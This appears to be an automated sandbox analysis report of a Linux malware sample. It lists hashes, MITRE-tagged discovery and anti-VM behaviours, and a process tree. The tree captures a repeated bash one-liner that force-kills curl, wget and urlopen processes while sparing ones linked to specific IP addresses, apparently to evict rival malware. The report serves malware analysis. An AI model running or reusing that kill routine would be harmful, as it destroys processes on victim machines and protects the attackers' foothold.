8fe5d51bd7d9e650132b7fa22f88e9c98b17a33ebcc64d0c6681199d0f4935fc

Analysis

max time kernel
149s
max time network
130s
platform
ubuntu-24.04_amd64
resource
ubuntu2404-amd64-20240523-en
resource tags

arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
submitted
18-12-2024 11:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

恶意软件/f13e48658426307d9d1434b50fa0493f566ed1f31d6e88bb4ac2ae12ec31ef1f
Size

2.6MB
MD5

19827af3181c12ee7a89cee51f254e2c
SHA1

7c3016dfdfd536e96ef9a7e1a51de01bc0390772
SHA256

f13e48658426307d9d1434b50fa0493f566ed1f31d6e88bb4ac2ae12ec31ef1f
SHA512

1d5915c8e7b8c24a77b17599bea32645ff5e12b7c37f17f2058199be2bf159eb5433f5193d65fdd8aa3a1eba7c4694921e9a0b1a25eb7ef44b2c8eb16d0f3fe9
SSDEEP

24576:aonS0jRd6W0mmMr3Qb5Kbhpe1oD/myq2XpvgEICu7BZBXni5C2UJYM:ZD8W0y7D/m6xe8G

Score

6^/10

antivm discovery

Malware Config

Signatures

Enumerates running processes
Discovers information about currently running processes on the system

Security Software Discovery 1 TTPs 64 IoCs

Adversaries may attempt to discover installed security software and its configurations.

discovery

Security Software Discovery

T1518.001

pid	Process
15299	Process not Found
19145	Process not Found
2993	bash
5203	Process not Found
5784	Process not Found
14574	Process not Found
15560	Process not Found
5261	Process not Found
8948	Process not Found
9673	Process not Found
10427	Process not Found
10920	Process not Found
18591	Process not Found
6396	Process not Found
7411	Process not Found
7643	Process not Found
16546	Process not Found
19116	Process not Found
4623	Process not Found
13066	Process not Found
14168	Process not Found
13211	Process not Found
16749	Process not Found
3579	Process not Found
6103	Process not Found
12370	Process not Found
7208	Process not Found
4826	Process not Found
5580	Process not Found
5842	Process not Found
15821	Process not Found
2484	bash
12167	Process not Found
14342	Process not Found
6976	Process not Found
7498	Process not Found
19580	Process not Found
19290	Process not Found
8281	Process not Found
10949	Process not Found
13675	Process not Found
9586	Process not Found
10659	Process not Found
3202	bash
3289	bash
8832	Process not Found
8600	Process not Found
19174	Process not Found
20624	Process not Found
2835	bash
4594	Process not Found
6222	Process not Found
5697	Process not Found
8716	Process not Found
9905	Process not Found
16488	Process not Found
16662	Process not Found
18243	Process not Found
6541	Process not Found
7005	Process not Found
8252	Process not Found
18942	Process not Found
20450	Process not Found
12660	Process not Found

Checks CPU configuration 1 TTPs 64 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found
File opened for reading	/proc/cpuinfo	Process not Found

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	Process not Found
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	Process not Found

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found
File opened for reading	/sys/devices/system/node	Process not Found

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
4547	Process not Found
8891	Process not Found
18737	Process not Found
18689	Process not Found
3735	Process not Found
6677	Process not Found
9829	Process not Found
3744	Process not Found
11230	Process not Found
15609	Process not Found
3126	ps
14314	Process not Found
18447	Process not Found
20702	Process not Found
9181	Process not Found
13309	Process not Found
13705	Process not Found
2565	ps
6726	Process not Found
14053	Process not Found
15812	Process not Found
10631	Process not Found
12274	Process not Found
14256	Process not Found
2826	ps
7412	Process not Found
11375	Process not Found
20306	Process not Found
8514	Process not Found
11704	Process not Found
13686	Process not Found
10051	Process not Found
19301	Process not Found
17780	Process not Found
17664	Process not Found
3004	ps
4711	Process not Found
18234	Process not Found
5581	Process not Found
9577	Process not Found
15348	Process not Found
4759	Process not Found
8659	Process not Found
12110	Process not Found
10476	Process not Found
10621	Process not Found
19542	Process not Found
5978	Process not Found
7228	Process not Found
8253	Process not Found
17964	Process not Found
3947	Process not Found
5136	Process not Found
11134	Process not Found
3899	Process not Found
13599	Process not Found
17079	Process not Found
4402	Process not Found
6977	Process not Found
19968	Process not Found
17925	Process not Found
19040	Process not Found
10689	Process not Found
13106	Process not Found

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/14/ctty	Process not Found
File opened for reading	/proc/1663/status	Process not Found
File opened for reading	/proc/6/status	Process not Found
File opened for reading	/proc/6783/status	Process not Found
File opened for reading	/proc/1068/cmdline	Process not Found
File opened for reading	/proc/744/stat	ps
File opened for reading	/proc/1117/cmdline	Process not Found
File opened for reading	/proc/201/environ	Process not Found
File opened for reading	/proc/432/environ	Process not Found
File opened for reading	/proc/744/environ	Process not Found
File opened for reading	/proc/2134/cmdline	Process not Found
File opened for reading	/proc/192/ctty	Process not Found
File opened for reading	/proc/1938/environ	Process not Found
File opened for reading	/proc/2156/cmdline	Process not Found
File opened for reading	/proc/1047/status	Process not Found
File opened for reading	/proc/2/cmdline	Process not Found
File opened for reading	/proc/779/ctty	Process not Found
File opened for reading	/proc/55/cmdline	Process not Found
File opened for reading	/proc/13/cmdline	Process not Found
File opened for reading	/proc/2449/ctty	Process not Found
File opened for reading	/proc/2289/environ	Process not Found
File opened for reading	/proc/758/stat	Process not Found
File opened for reading	/proc/15062/stat	Process not Found
File opened for reading	/proc/2387/status	Process not Found
File opened for reading	/proc/2083/ctty	Process not Found
File opened for reading	/proc/2387/stat	Process not Found
File opened for reading	/proc/1045/environ	ps
File opened for reading	/proc/2202/cmdline	ps
File opened for reading	/proc/4/environ	Process not Found
File opened for reading	/proc/494/ctty	Process not Found
File opened for reading	/proc/1911/ctty	Process not Found
File opened for reading	/proc/2289/ctty	Process not Found
File opened for reading	/proc/1930/cmdline	Process not Found
File opened for reading	/proc/1065/stat	Process not Found
File opened for reading	/proc/1919/environ	Process not Found
File opened for reading	/proc/26/cmdline	Process not Found
File opened for reading	/proc/190/cmdline	Process not Found
File opened for reading	/proc/577/ctty	Process not Found
File opened for reading	/proc/1097/stat	Process not Found
File opened for reading	/proc/46/stat	Process not Found
File opened for reading	/proc/1911/cmdline	Process not Found
File opened for reading	/proc/1393/environ	Process not Found
File opened for reading	/proc/1630/environ	Process not Found
File opened for reading	/proc/4268/ctty	Process not Found
File opened for reading	/proc/1745/cmdline	Process not Found
File opened for reading	/proc/2387/stat	Process not Found
File opened for reading	/proc/417/ctty	Process not Found
File opened for reading	/proc/1921/ctty	Process not Found
File opened for reading	/proc/1120/status	Process not Found
File opened for reading	/proc/8/status	Process not Found
File opened for reading	/proc/47/status	Process not Found
File opened for reading	/proc/744/status	Process not Found
File opened for reading	/proc/34/status	Process not Found
File opened for reading	/proc/3/status	Process not Found
File opened for reading	/proc/1927/ctty	Process not Found
File opened for reading	/proc/1062/stat	Process not Found
File opened for reading	/proc/48/status	ps
File opened for reading	/proc/39/stat	Process not Found
File opened for reading	/proc/1908/ctty	Process not Found
File opened for reading	/proc/195/status	Process not Found
File opened for reading	/proc/7/cmdline	Process not Found
File opened for reading	/proc/775/ctty	Process not Found
File opened for reading	/proc/1921/stat	Process not Found
File opened for reading	/proc/40/environ	Process not Found

/tmp/恶意软件/f13e48658426307d9d1434b50fa0493f566ed1f31d6e88bb4ac2ae12ec31ef1f
/tmp/恶意软件/f13e48658426307d9d1434b50fa0493f566ed1f31d6e88bb4ac2ae12ec31ef1f
1⤵
PID:2449
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2454
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2456
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2457
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2458
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2459
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2460
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2461
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2462
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2463
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2464
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2465
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2466
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2467
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2468
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2470
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2469
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2471
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2472
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2473
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2474
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2475
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2476
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2477
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2478
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2479
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2480
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2481
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2482
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2483
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  - Security Software Discovery
  PID:2484
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2485
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2486
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2487
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2488
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2489
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2490
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2491
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2492
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2493
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2494
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2498
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2499
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2500
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2501
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2502
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2503
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2504
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2505
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2506
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2507
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2508
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2509
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2510
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2511
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2512
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2513
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2514
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2515
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2516
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2517
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2518
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2519
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2520
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2521
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2522
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2523
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2524
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2525
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2526
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:2527
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2528
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2529
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2530
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2531
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2532
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2533
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2534
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2535
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2536
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2537
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2538
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2539
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2541
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2540
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2542
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2543
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2544
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2545
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2546
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2548
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2547
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2549
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2550
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2551
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2552
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2553
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2554
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2555
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2557
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2556
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2558
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2559
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2560
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2561
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2562
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2563
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2564
- - /usr/bin/ps
    ps aux
    3⤵
    - Process Discovery
    PID:2565
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2566
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2567
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2568
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2569
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2570
- - /usr/bin/grep
    grep urlopen
    3⤵
    PID:2571
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2572
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2573
- /usr/bin/bash
  bash -c "ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v '192.227.90' | grep -v iosk | grep -v g4mm4 | grep 'curl' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v grep | grep -v '202.28.229.174' | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'wget' | awk '{print \$2}' | xargs -i kill -9 {}; ps aux | grep -v '202.28.229.174' | grep -v grep | grep -v '192.157.86' | grep -v iosk | grep -v g4mm4 | grep 'urlopen' | awk '{print \$2}' | xargs -i kill -9 {}"
  2⤵
  PID:2574
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:2575
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2576
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2577
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2578
- - /usr/bin/grep
    grep -v 192.227.90
    3⤵
    PID:2579
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2580
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2581
- - /usr/bin/grep
    grep curl
    3⤵
    PID:2582
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2584
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2583
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2585
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2586
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2587
- - /usr/bin/grep
    grep -v 192.157.86
    3⤵
    PID:2588
- - /usr/bin/grep
    grep -v iosk
    3⤵
    PID:2589
- - /usr/bin/grep
    grep -v g4mm4
    3⤵
    PID:2590
- - /usr/bin/grep
    grep wget
    3⤵
    PID:2591
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:2592
- - /usr/bin/xargs
    xargs -i kill -9 "{}"
    3⤵
    PID:2593
- - /usr/bin/grep
    grep -v 202.28.229.174
    3⤵
    PID:2595
- - /usr/bin/ps
    ps aux
    3⤵
    PID:2594
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2596
